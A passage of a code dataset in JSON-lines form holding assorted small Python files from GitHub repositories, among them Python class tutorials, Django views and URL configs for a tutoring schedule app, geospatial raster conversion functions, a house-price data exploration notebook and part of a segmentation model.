{}'.format(s1.n1,s1.n2);\n\ns1=Student(100,20);\ns2=Student(59,1);\n\ns3=s1+s2;\nprint(s3.n1);\n\nif s1>s2:\n print(\"S1 wins\");\nelse:\n print(\"S2 wins\");\n\ns=9;\nprint(s.__str__());\n\nprint(s1);","repo_name":"MdAbuZehadAntu/Python_Basics","sub_path":"OperatorOverloadingPolymorphism.py","file_name":"OperatorOverloadingPolymorphism.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25778440683","text":"from rest_framework.filters import (\n FilterSet\n)\nfrom csacompendium.research.models import NitrogenApplied\n\n\nclass NitrogenAppliedListFilter(FilterSet):\n \"\"\"\n Filter query list from nitrogen applied database table\n \"\"\"\n class Meta:\n model = NitrogenApplied\n fields = {\n 'nitrogen_amount': ['exact', 'gte', 'lte'],\n 'amount_uom': ['iexact', 'icontains'],\n 'nitrogen_source': ['iexact', 
'icontains'],\n        }\n        order_by = ['nitrogen_amount']\n","repo_name":"nkoech/csacompendium","sub_path":"csacompendium/research/api/nitrogenapplied/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34731963205","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nadmin.autodiscover()\n\nurlpatterns = patterns(\n    '',\n\n    # css3two_blog\n    url(r'^(?P<page>\\d*)/$', 'css3two_blog.views.home'),\n    url(r'^$', 'css3two_blog.views.home'),\n    url(r'^blog/', include('css3two_blog.urls')),\n    url('^sitemap/$', 'css3two_blog.views.sitemap'),\n\n    # admin\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^referral/', 'my_blog.views.referral')\n) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nhandler404 = 'my_blog.views.handler404'\n","repo_name":"wangyuxiong/My_Blog","sub_path":"my_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"36749000427","text":"\n# class\n\nclass Person:\n    \n    #class attributes\n    address='no information'\n    #constructor (initializer method)\n    def __init__(self, name, year):\n        #object attributes\n        self.name=name\n        self.year=year\n        print('the init method ran.')\n    #methods\n\n\n# object (instance)\np1=Person(name='ali', year=1990)\np2=Person(name='yagmur', year=1995)\n\np1.name='ahmet'\np1.address='kocaeli'\n\nprint(p1)\nprint(p2)\n#accessing object attributes\nprint(f'name : {p1.name}, year: {p1.year}, address : {p1.address}')\nprint(f'name : {p2.name}, year: {p2.year}, address : {p2.address}')\n\n# print(p1, p2)\n# print(type(p1))\n# print(type(p2))","repo_name":"AydinTokuslu/pyhthonBasics","sub_path":"Genel/CLASS.PY","file_name":"CLASS.PY","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29860249370","text":"import requests\nimport validators # Check if a string is a valid URL or not\nfrom requests.exceptions import Timeout #the time it will wait on a response once your client has established a connection\n\nURL=input(\"Hello, enter your link: \")\nvalid=validators.url(URL)\n\nwhile valid!=True:\n    print(\"You entered an invalid link (URL)!\")\n
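    # loop until validators.url() returns True for the entered string\n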
\")\n url=input(\"Enter the Link(URl) again: \")\n valid = validators.url(url)\n URL=url\nelse:\n\n print(\"The Link(Url) is valid\")\n g=requests.get(URL)\n print(g.text)\n\n\ntry:\n response = requests.get(URL, timeout=1)\nexcept Timeout:\n print('The request timed out')\nelse:\n print('The request did not time out')\n\n","repo_name":"MaramAlsofiani/Reading-the-content-of-a-URL","sub_path":"ReadURL.py","file_name":"ReadURL.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73209484952","text":"T = int(input())\nfor tc in range(1, T+1):\n K, N, M = map(int, input().split())\n lst = list(map(int, input().split()))\n\n bus_stop = [i for i in range(N+1)]\n my_pos = 0\n cnt = 0\n\n flag = True\n while flag:\n for i in range(K, 0, -1):\n if my_pos + i < N:\n if bus_stop[my_pos + i] in lst:\n cnt += 1\n my_pos = my_pos + i\n break\n else:\n flag = False\n break\n else:\n flag = False\n cnt = 0\n\n print(f'#{tc} {cnt}')","repo_name":"KangDaeSu/TIL","sub_path":"231101/swea_4831.py","file_name":"swea_4831.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37130727567","text":"from config import *\n\n\ndef extract_nc_data_to_array(nc_path):\n \"\"\"\n Extracts the dataset from nc file\n\n :param nc_path: string, with the path to the nc file\n :return: nc.Dataset, with the nc bands; int, with the width in longitude degree; int, with the heigh in latitude degree\n \"\"\"\n ds = nc.Dataset(nc_path)\n ds_lon = ds.variables['longitude'].shape[0]\n ds_lat = ds.variables['latitude'].shape[0]\n\n return ds, ds_lon, ds_lat\n\n\ndef apply_cfac_to_array(ds, ds_lon, ds_lat, c_fac_arr):\n \"\"\"\n Applys a c factor value for summer and winter based on a nc dataset that contains 32 PFT bands. Each band contains\n percent share of the land cover for each pixel. Based on the share the percentual C-factor is applied.\n\n :param ds: nc.Dataset, that contains land use classes (32 PFT bands)\n :param ds_lon: int, with the width in longitude degrees\n :param ds_lat: int, with the height in latitude degrees\n :param c_fac_arr: np.array, with 32 rows and 3 columns. The rows have to align to the 32 PFT bands. The columns have to have [Name/index, C-factor summer value, C-factor winter value, ...]\n :return: np.array, with c-factors (summer) accroding to lat and lon; np.array, with c-factors (winter) accroding to lat and lon\n \"\"\"\n merged_raster_summer = np.zeros([ds_lat, ds_lon], dtype=float, order='C')\n merged_raster_winter = np.zeros([ds_lat, ds_lon], dtype=float, order='C')\n\n for pft_nr in range(len(ds.variables) - 2):\n # Apply each C-Factors share to every pixel\n r_fac_summer = ds.variables[\"PFT\" + str(pft_nr)][:] / 100 * c_fac_arr.loc[pft_nr][1]\n r_fac_winter = ds.variables[\"PFT\" + str(pft_nr)][:] / 100 * c_fac_arr.loc[pft_nr][2]\n\n # Data is fipped by 90° therefore rotate it\n merged_raster_summer += np.transpose(r_fac_summer)\n merged_raster_winter += np.transpose(r_fac_winter)\n\n return merged_raster_summer, merged_raster_winter\n\n\ndef export_to_tif(ds_lon, ds_lat, merged_raster, export_file):\n \"\"\"\n Converts a raster array to a GEOTIFF file and exports it to the given location. 
def export_to_tif(ds_lon, ds_lat, merged_raster, export_file):\n    \"\"\"\n    Converts a raster array to a GEOTIFF file and exports it to the given location. The export is saved as proj=latlong\n    in the coordinate system epsg:4326\n\n    :param ds_lon: int, with the width in longitude degrees\n    :param ds_lat: int, with the height in latitude degrees\n    :param merged_raster: np.array, with the C-factors for each pixel\n    :param export_file: str, with the new path to the GEOTIFF\n    \"\"\"\n    # create the transform for the base matrix in lat/long projection\n    transform = rio.transform.Affine.translation(-180, 90) * rio.transform.Affine.scale(0.05000000120000000492,\n                                                                                        -0.05000000119999999798)\n\n    dst_crs = '+proj=latlong'\n    #dst_crs = \"EPSG:32634\"\n    #dst_crs = \"EPSG:4326\"\n    profile = {\n        'driver': 'GTiff',\n        'height': ds_lat,\n        'width': ds_lon,\n        'count': 1,\n        'dtype': str(merged_raster.dtype),\n        'transform': transform\n    }\n\n    with rio.open(export_file, 'w', crs=dst_crs, **profile) as dst:\n        dst.write(merged_raster, 1)\n\n\ndef transform_to_target_crs(src_file, dst_file, dst_crs):\n    \"\"\"\n    Transforms a GEOTIFF file to the target CRS.\n\n    :param src_file: str, with the path to the original GEOTIFF\n    :param dst_file: str, with the path to the new GEOTIFF\n    :param dst_crs: str, with the new CRS\n    \"\"\"\n    with rio.open(src_file) as src:\n        # transform for input raster\n        src_transform = src.transform\n\n        # calculate the transform matrix for the output\n        dst_transform, width, height = wrp.calculate_default_transform(\n            src.crs,  # source CRS\n            dst_crs,  # destination CRS\n            src.width,  # column count\n            src.height,  # row count\n            *src.bounds,  # unpacks outer boundaries (left, bottom, right, top)\n        )\n\n        if USELOG:\n            print(\"Source Transform:\\n\", src_transform, '\\n')\n            print(\"Destination Transform:\\n\", dst_transform)\n\n        # set properties for output\n        dst_kwargs = src.meta.copy()\n        dst_kwargs.update(\n            {\n                \"crs\": dst_crs,\n                \"transform\": dst_transform,\n                \"width\": width,\n                \"height\": height,\n                \"nodata\": -9999,  # replace 0 with np.nan\n            }\n        )\n\n        with rio.open(dst_file, \"w\", **dst_kwargs) as dst:\n            for i in range(1, src.count + 1):\n                wrp.reproject(\n                    source=rio.band(src, i),\n                    destination=rio.band(dst, i),\n                    src_transform=src.transform,\n                    src_crs=src.crs,\n                    dst_transform=dst_transform,\n                    dst_crs=dst_crs,\n                    resampling=Resampling.nearest,\n                )\n\n\ndef get_file_str(file_path):\n    \"\"\"\n    Returns the file name of an entire file path.\n\n    :param file_path: str, with the file path\n    :return: str, with the file name\n    \"\"\"\n    alias = os.path.splitext(os.path.split(file_path)[1])[0]\n    return alias\n","repo_name":"KMouris/LU_nc_to_C","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33578539529","text":"from django.shortcuts import get_object_or_404, render\n\n# Create your views here.\nfrom .models import Jadwal, CustomUser\nfrom .forms import JadwalForm\nfrom django.http import HttpResponseRedirect\nfrom django.http.response import HttpResponse, JsonResponse\nfrom django.core import serializers\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.loader import render_to_string\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import JadwalSerializer\nfrom rest_framework import status\n\n\ndef is_guru(user):\n    return user.groups.filter(name='Guru').exists()\n\n@api_view(['GET'])\ndef get_jadwals(request,username):\n    try:\n        user = CustomUser.objects.get(username=username)\n        if is_guru(user):\n            jadwals = 
Jadwal.objects.all().filter(guru=user)\n serializer = JadwalSerializer(jadwals, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET'])\ndef get_jadwal(request, pk):\n jadwal = Jadwal.objects.get(id=pk)\n serializer = JadwalSerializer(jadwal, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef create_jadwal(request):\n try:\n data = request.data\n jadwal = Jadwal.objects.create(\n title = data[\"title\"],\n kelas = data[\"kelas\"],\n day = data[\"day\"],\n start = data[\"start\"],\n end = data[\"end\"],\n link = data[\"link\"],\n desc = data[\"desc\"],\n guru = CustomUser.objects.get(username=data[\"guru\"])\n )\n serializer = JadwalSerializer(jadwal, many=False)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\ndef update_jadwal(request, pk):\n try:\n data = request.data\n jadwal = Jadwal(\n id = pk,\n title = data[\"title\"],\n kelas = data[\"kelas\"],\n day = data[\"day\"],\n start = data[\"start\"],\n end = data[\"end\"],\n link = data[\"link\"],\n desc = data[\"desc\"],\n guru = CustomUser.objects.get(username=data[\"guru\"])\n )\n jadwal.save()\n serializer = JadwalSerializer(jadwal, many=False)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n# def jadwal_json(request):\n# obj = Jadwal.objects.all()\n# data = serializers.serialize('json', list(obj), fields=('title','kelas', 'link', 'day'))\n# return HttpResponse(data, content_type=\"application/json\")\n \n# def add_jadwal(request):\n# if not is_guru(request.user):\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# if request.method == 'POST':\n# data = json.loads(request.body)\n# form = JadwalForm()\n \n# form.day = data[\"day\"]\n# form.start = data[\"start\"]\n# form.end = data[\"end\"]\n# form.link = data[\"link\"]\n# form.kelas = data[\"kelas\"]\n# form.title = data[\"title\"]\n# form.desc = data[\"desc\"]\n# form.guru = request.user\n\n# form.save()\n\n# return JsonResponse({\"status\": \"success\"}, status=200)\n# else:\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# def update_jadwal(request):\n# if not is_guru(request.user):\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# if request.method == 'POST':\n# data = json.loads(request.body)\n# jadwal = Jadwal.objects.all().filter(guru=request.user)\n# obj = jadwal.filter(id=data['id']).first()\n\n# if not obj:\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n# form = JadwalForm(instance=obj)\n \n# form.day = data[\"day\"]\n# form.start = data[\"start\"]\n# form.end = data[\"end\"]\n# form.link = data[\"link\"]\n# form.kelas = data[\"kelas\"]\n# form.title = data[\"title\"]\n# form.desc = data[\"desc\"]\n# form.guru = request.user\n\n# form.save()\n\n# return JsonResponse({\"status\": \"success\"}, status=200)\n# else:\n# return JsonResponse({\"status\": \"error\"}, status=401)\n\n@login_required(login_url='/pendaftaranguru/')\ndef jadwal(request, pk = None):\n if not is_guru(request.user):\n return render(request, 'jadwal.html', {'is_guru':False})\n \n edit = False\n jadwal = Jadwal.objects.all().filter(guru=request.user)\n \n # Update Jadwal\n if pk != None:\n edit = True\n obj = jadwal.filter(id=pk).first()\n\n if not obj:\n return 
HttpResponseRedirect('/jadwal')\n\n        form = JadwalForm(instance=obj)\n        if request.method == 'POST' and request.user.is_authenticated:\n            form = JadwalForm(request.POST, instance=obj)\n            if form.is_valid():\n                form.save()\n                return HttpResponseRedirect('/jadwal')\n        else:\n            pass\n\n    # Create Jadwal\n    else:\n        if request.method == 'POST' and request.user.is_authenticated:\n            form = JadwalForm(request.POST)\n            if form.is_valid():\n                obj = form.save(commit=False)\n                obj.guru = request.user\n                form.save()\n                return HttpResponseRedirect('/jadwal')\n            else:\n                obj = None\n        else:\n            form = JadwalForm()\n            obj = None\n\n    return render(request, 'jadwal.html', {'is_guru':True, 'form':form, 'jadwal': jadwal, 'obj':obj, 'edit':edit})\n\ndef filter_jadwal(request):\n    kelas=request.GET.getlist('kelas[]')\n    jadwal=Jadwal.objects.all().filter(guru=request.user)\n    if len(kelas)>0:\n        jadwal=jadwal.filter(kelas__in=kelas).distinct()\n    \n    t=render_to_string('jadwal_card.html',{'jadwal':jadwal})\n    return JsonResponse({'data':t})\n\n","repo_name":"bryanmahdavikhia/Bimbol","sub_path":"jadwal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6622191449","text":"import json\nfrom data_tokenizer import TokenizerWrap\n\ndata_src = json.loads(open(\"data/src.json\", \"r\").read())\ndata_src = ['' if i is None else i for i in data_src]\ndata_dest = json.loads(open(\"data/dest.json\", \"r\").read())\ndata_dest = ['' if i is None else i for i in data_dest]\nnum_words = 10000\ntokenizer_src = TokenizerWrap(texts=data_src,padding='pre',reverse=True,num_words=num_words,coded_text=False)\ntokenizer_dest = TokenizerWrap(texts=data_dest,padding='post',reverse=False,num_words=num_words,coded_text=True)\n\ndef jsonify(ipclass):\n\tfor key , value in ipclass.items():\n\t\tprint(key)\n\t\tif key =='tokens_padded':\n\t\t\tipclass[key] = value.tolist()\n\treturn ipclass\n\nprint(\"dest\")\nd_dict = jsonify(tokenizer_dest.__dict__)\nprint(\"src\")\ns_dict = jsonify(tokenizer_src.__dict__)\n\njson.dump(d_dict,open('data/dest_tok.json', \"w\"))\njson.dump(s_dict,open('data/src_tok.json', \"w\"))","repo_name":"omkarjc27/nmt-code-generator","sub_path":"pretokenize.py","file_name":"pretokenize.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70771173519","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport seaborn as sns\nsns.set(style=\"whitegrid\", color_codes=True)\nsns.set(font_scale=1)\n\nfrom sklearn.linear_model import LinearRegression\n\n\n\n\nhouses=pd.read_csv(\"../input/train.csv\")\nhouses.head()\n\n\n\n\nhouses_test = pd.read_csv(\"../input/test.csv\")\nhouses_test.head()\n#note there is no \"SalePrice\" column here which is our target variable.\n\n\n\n\n#shape command will give number of rows/samples/examples and number of columns/features/predictors in dataset\n#(rows,columns)\nhouses.shape\n\n\n\n\nhouses_test.shape\n#1 column less because target variable isn't there in test set!\n\n\n\n\n#info method provides information about dataset like \n#total values in each column, null/not null, datatype, memory occupied etc\nhouses.info()\n\n\n\n\n#How many columns with different datatypes are there?\nhouses.dtypes.value_counts()\n\n\n\n\n##Describe gives statistical 
information about numerical columns in the dataset\nhouses.describe()\n\n\n\n\ncorr=houses.corr()[\"SalePrice\"]\ncorr[np.argsort(corr, axis=0)[::-1]]\n\n\n\n\ncorr=houses[['OverallQual' ,'GrLivArea' ,'GarageCars','GarageArea' ,\n 'TotalBsmtSF','1stFlrSF','FullBath','TotRmsAbvGrd',\n 'YearBuilt','YearRemodAdd','SalePrice']].corr()#[\"SalePrice\"]\n#plt.figure(figsize=(10, 10))\n\nsns.heatmap(corr, vmax=1, square=True,annot=True)\nplt.title('Correlation between features')\n\n\n\n\ncorrelations=houses.corr()\nattrs = correlations.iloc[:-1,:-1] # all except target\n\nthreshold = 0.5\nimportant_corrs = (attrs[abs(attrs) > threshold][attrs != 1.0]) .unstack().dropna().to_dict()\n\nunique_important_corrs = pd.DataFrame(\n list(set([(tuple(sorted(key)), important_corrs[key]) \\\n for key in important_corrs])), \n columns=['Attribute Pair', 'Correlation'])\n\n # sorted by absolute value\nunique_important_corrs = unique_important_corrs.ix[\n abs(unique_important_corrs['Correlation']).argsort()[::-1]]\n\nunique_important_corrs\n\n\n\n\nhouses[['OverallQual','SalePrice']].groupby(['OverallQual'],\nas_index=False).mean().sort_values(by='OverallQual', ascending=False)\n\n\n\n\nhouses[['GarageCars','SalePrice']].groupby(['GarageCars'],\nas_index=False).mean().sort_values(by='GarageCars', ascending=False)\n\n\n\n\nhouses[['Fireplaces','SalePrice']].groupby(['Fireplaces'],\nas_index=False).mean().sort_values(by='Fireplaces', ascending=False)\n\n\n\n\n#lets see if there are any columns with missing values \nnull_columns=houses.columns[houses.isnull().any()]\nhouses[null_columns].isnull().sum()\n\n\n\n\nhouses['LotFrontage'].corr(houses['LotArea'])\n\n\n\n\nhouses['SqrtLotArea']=np.sqrt(houses['LotArea'])\nhouses['LotFrontage'].corr(houses['SqrtLotArea'])\n\n\n\n\nsns.jointplot(houses['LotFrontage'],houses['SqrtLotArea'],color='gold')\n\n\n\n\nfilter = houses['LotFrontage'].isnull()\nhouses.LotFrontage[filter]=houses.SqrtLotArea[filter]\n\n\n\n\nplt.scatter(houses[\"MasVnrArea\"],houses[\"SalePrice\"])\nplt.show()\n\n\n\n\nhouses[\"MasVnrType\"].value_counts().plot(kind='bar',colors='gold')\n\n\n\n\nhouses[\"MasVnrType\"] = houses[\"MasVnrType\"].fillna('None')\nhouses[\"MasVnrArea\"] = houses[\"MasVnrArea\"].fillna(0.0)\n\n\n\n\nlabels = houses[\"Electrical\"].unique()\nsizes = houses[\"Electrical\"].value_counts().values\nexplode=[0.1,0,0,0,0]\nparcent = 100.*sizes/sizes.sum()\nlabels = ['{0} - {1:1.1f} %'.format(i,j) for i,j in zip(labels, parcent)]\n\ncolors = [ 'lightcoral','gold','yellowgreen', 'lightblue','purple']\npatches, texts= plt.pie(sizes, colors=colors,explode=explode,\n startangle=90)\nplt.legend(patches, labels, loc=\"best\")\n\nplt.title(\"Electrical\")\nplt.show()\n\n\n\n\n#We can replace missing values with most frequent ones.\nhouses[\"Electrical\"] = houses[\"Electrical\"].fillna('SBrkr')\n\n\n\n\nsns.stripplot(x=houses[\"Alley\"], y=houses[\"SalePrice\"],jitter=True)\n\n\n\n\nhouses[\"Alley\"] = houses[\"Alley\"].fillna('None')\n\n\n\n\nsns.distplot(houses[\"TotalBsmtSF\"])\n\n\n\n\nbasement_cols=['BsmtQual','BsmtCond','BsmtExposure','BsmtFinType1','BsmtFinType2','BsmtFinSF1','BsmtFinSF2']\nhouses[basement_cols][houses['BsmtQual'].isnull()==True]\n\n\n\n\nfor col in basement_cols:\n if 'FinSF'not in col:\n houses[col] = houses[col].fillna('None')\n\n\n\n\nsns.factorplot(\"Fireplaces\",\"SalePrice\",data=houses,hue=\"FireplaceQu\")\n\n\n\n\n#If fireplace quality is missing that means that house doesn't have a fireplace\nhouses[\"FireplaceQu\"] = 
houses[\"FireplaceQu\"].fillna('None')\npd.crosstab(houses.Fireplaces, houses.FireplaceQu)\n\n\n\n\nsns.boxplot(houses[\"GarageArea\"],color='r')\n\n\n\n\nsns.barplot(houses[\"GarageCars\"],houses[\"SalePrice\"])\n\n\n\n\ngarage_cols=['GarageType','GarageQual','GarageCond','GarageYrBlt','GarageFinish','GarageCars','GarageArea']\nhouses[garage_cols][houses['GarageType'].isnull()==True]\n\n\n\n\nfor col in garage_cols:\n if houses[col].dtype==np.object:\n houses[col] = houses[col].fillna('None')\n else:\n houses[col] = houses[col].fillna(0)\n\n\n\n\n#If PoolArea is 0, that means that house doesn't have a pool.\n#So we can replace PoolQuality with None.\nhouses[\"PoolQC\"] = houses[\"PoolQC\"].fillna('None')\n\n\n\n\nlabels = houses[\"Fence\"].unique()\nsizes = houses[\"Fence\"].value_counts().values\nexplode=[0.1,0,0,0]\nparcent = 100.*sizes/sizes.sum()\n#labels = ['{0} - {1:1.1f} %'.format(i,j) for i,j in zip(labels, parcent)]\n\ncolors = ['yellowgreen', 'gold', 'lightblue', 'lightcoral']\npatches, texts,autotexts= plt.pie(sizes, colors=colors,autopct=\"%1.1f%%\",\n shadow=True,startangle=90)\nplt.legend(patches, labels, loc=\"best\")\n\nplt.title(\"Fence\")\nplt.show()\n\n\n\n\nhouses[\"Fence\"] = houses[\"Fence\"].fillna('None')\n\n\n\n\nhouses[\"MiscFeature\"].value_counts().plot(kind='pie')\n\n\n\n\n#Some houses don't have miscellaneous features like shed, Tennis court etc..\nhouses[\"MiscFeature\"] = houses[\"MiscFeature\"].fillna('None')\n\n\n\n\n#Let's confirm that we have removed all missing values\nhouses[null_columns].isnull().sum()\n\n\n\n\nlabels = houses[\"MSZoning\"].unique()\nsizes = houses[\"MSZoning\"].value_counts().values\nexplode=[0.1,0,0,0,0]\nparcent = 100.*sizes/sizes.sum()\nlabels = ['{0} - {1:1.1f} %'.format(i,j) for i,j in zip(labels, parcent)]\n\ncolors = ['yellowgreen', 'gold', 'lightblue', 'lightcoral','blue']\npatches, texts= plt.pie(sizes, colors=colors,explode=explode,\n shadow=True,startangle=90)\nplt.legend(patches, labels, loc=\"best\")\n\nplt.title(\"Zoning Classification\")\nplt.show()\n\n\n\n\nplt.hist(houses[\"GrLivArea\"],color='purple')\nplt.xlabel(\"Ground Living Area\")\nplt.show()\n\n\n\n\nsns.distplot(houses[\"YearBuilt\"],color='seagreen')\n\n\n\n\nsns.distplot(houses[\"YearRemodAdd\"],color='r')\n\n\n\n\nhouses[\"Heating\"].value_counts().plot(kind='bar')\n\n\n\n\nsns.factorplot('HeatingQC', 'SalePrice', hue = 'CentralAir', data=houses)\n\n\n\n\nsns.countplot(houses[\"FullBath\"])\n\n\n\n\nsns.countplot(houses[\"TotRmsAbvGrd\"])\n\n\n\n\nsns.factorplot(\"KitchenAbvGr\",\"SalePrice\",data=houses,hue=\"KitchenQual\")\n\n\n\n\nsns.countplot(x = 'Neighborhood', data = houses)\nplt.xticks(rotation=45) \nplt.show()\n\n\n\n\nplt.barh(houses[\"OverallQual\"],width=houses[\"SalePrice\"],color=\"r\")\n\n\n\n\nplt.scatter(houses[\"1stFlrSF\"],houses[\"SalePrice\"])\nplt.show()\n\n\n\n\n#street\nsns.stripplot(x=houses[\"Street\"], y=houses[\"SalePrice\"])\n\n\n\n\n\n\n","repo_name":"aorursy/Filtered-NB-Python-3","sub_path":"hassansin_house-prices-data-exploration-and-visualisation.py","file_name":"hassansin_house-prices-data-exploration-and-visualisation.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23441131307","text":"import pygame, sys, random\nfrom pygame.locals import*\nENEMYTRI = pygame.image.load('enemytri.png')\nclass enemyt(pygame.sprite.Sprite):\n #Initialize the attributes related to the trex's position (x and y coords), image, and 
rectangle hitbox\n def __init__(self):\n #Calls the Sprite class constructor.\n #It must be the first line in constructor.\n super().__init__()\n #add something to this function to what you have in trex.py\n self.image = ENEMYTRI\n self.rect = pygame.Rect(180,180,25,25)\n self.rect.x = 180\n self.rect.y = 180\n #Don't forget to add rect and image attributes!\n\n #Changes the cactus's horizontal location\n '''def move(self):\n if self.rect.x > -100:\n self.rect.x = self.rect.x-5\n self.rect.x = self.rect.x\n self.rect.y = 200\n elif self.rect.x <= -100:\n self.rect.x = 500'''\n","repo_name":"jsmith2020/Worldshardestgame-","sub_path":"enemytri.py","file_name":"enemytri.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7245456456","text":"import logging\nfrom functools import partial\nfrom typing import Dict, List, Tuple\n\nimport torch\nfrom detectron2.config import configurable\nfrom detectron2.layers import ShapeSpec\nfrom detectron2.utils.logger import log_first_n\nfrom detectron2.utils.registry import Registry\nfrom timm import create_model\nfrom timm.models.vision_transformer import VisionTransformer\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom ..layers import MLP, build_fusion_layer\nfrom .timm_wrapper import PatchEmbed\n\nSIDE_ADAPTER_REGISTRY = Registry(\"SIDE_ADAPTER\")\nSIDE_ADAPTER_REGISTRY.__doc__ = \"\"\"\nRegistry for side adapter.\n\"\"\"\n\n\ndef build_side_adapter_network(cfg, input_shape):\n name = cfg.MODEL.SIDE_ADAPTER.NAME\n return SIDE_ADAPTER_REGISTRY.get(name)(cfg, input_shape)\n\n\nclass MLPMaskDecoder(nn.Module):\n def __init__(\n self,\n *,\n in_channels: int,\n total_heads: int = 1,\n total_layers: int = 1,\n embed_channels: int = 256,\n mlp_channels: int = 256,\n mlp_num_layers: int = 3,\n rescale_attn_bias: bool = False,\n ):\n super().__init__()\n self.total_heads = total_heads\n self.total_layers = total_layers\n\n dense_affine_func = partial(nn.Conv2d, kernel_size=1)\n # Query Branch\n self.query_mlp = MLP(in_channels, mlp_channels, embed_channels, mlp_num_layers)\n # Pixel Branch\n self.pix_mlp = MLP(\n in_channels,\n mlp_channels,\n embed_channels,\n mlp_num_layers,\n affine_func=dense_affine_func,\n )\n # Attention Bias Branch\n self.attn_mlp = MLP(\n in_channels,\n mlp_channels,\n embed_channels * self.total_heads * self.total_layers,\n mlp_num_layers,\n affine_func=dense_affine_func,\n )\n if rescale_attn_bias:\n self.bias_scaling = nn.Linear(1, 1)\n else:\n self.bias_scaling = nn.Identity()\n\n def forward(\n self, query: torch.Tensor, x: torch.Tensor\n ) -> Tuple[torch.Tensor, List[torch.Tensor]]:\n # query: [B,N,C]\n # x: [B,C,H,W]\n query = self.query_mlp(query)\n pix = self.pix_mlp(x)\n b, c, h, w = pix.shape\n # preidict mask\n mask_preds = torch.einsum(\"bqc,bchw->bqhw\", query, pix)\n # generate attn bias\n attn = self.attn_mlp(x)\n attn = attn.reshape(b, self.total_layers, self.total_heads, c, h, w)\n attn_bias = torch.einsum(\"bqc,blnchw->blnqhw\", query, attn)\n attn_bias = self.bias_scaling(attn_bias[..., None]).squeeze(-1)\n attn_bias = attn_bias.chunk(self.total_layers, dim=1)\n attn_bias = [attn.squeeze(1) for attn in attn_bias]\n return mask_preds, attn_bias\n\n\n@SIDE_ADAPTER_REGISTRY.register()\nclass RegionwiseSideAdapterNetwork(nn.Module):\n @configurable\n def __init__(\n self,\n vit_model: VisionTransformer,\n fusion_layers: nn.ModuleList,\n mask_decoder: nn.Module,\n num_queries: int,\n fusion_map: 
Dict[int, int],\n deep_supervision_idxs: List[int],\n ):\n super().__init__()\n # remove cls token\n if vit_model.cls_token is not None:\n vit_model.pos_embed = nn.Parameter(vit_model.pos_embed[:, 1:, ...])\n del vit_model.cls_token\n vit_model.cls_token = None\n # delete out norm\n del vit_model.norm\n vit_model.norm = nn.Identity()\n self.vit_model = vit_model\n\n self.num_queries = num_queries\n self.num_features = vit_model.num_features\n # add query token\n self.query_embed = nn.Parameter(torch.zeros(1, num_queries, self.num_features))\n self.query_pos_embed = nn.Parameter(\n torch.zeros(1, num_queries, self.num_features)\n )\n nn.init.normal_(self.query_embed, std=0.02)\n nn.init.normal_(self.query_pos_embed, std=0.02)\n self.fusion_layers = fusion_layers\n self.fusion_map = fusion_map\n self.mask_decoder = mask_decoder\n # for training\n self.deep_supervision_idxs = deep_supervision_idxs\n\n @classmethod\n def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]):\n vit = create_model(\n cfg.MODEL.SIDE_ADAPTER.VIT_NAME,\n cfg.MODEL.SIDE_ADAPTER.PRETRAINED,\n img_size=cfg.MODEL.SIDE_ADAPTER.IMAGE_SIZE,\n drop_path_rate=cfg.MODEL.SIDE_ADAPTER.DROP_PATH_RATE,\n fc_norm=False,\n num_classes=0,\n embed_layer=PatchEmbed,\n )\n # [\"0->0\",\"3->1\",\"6->2\",\"9->3\"]\n fusion_map: List[str] = cfg.MODEL.SIDE_ADAPTER.FUSION_MAP\n\n x2side_map = {int(j): int(i) for i, j in [x.split(\"->\") for 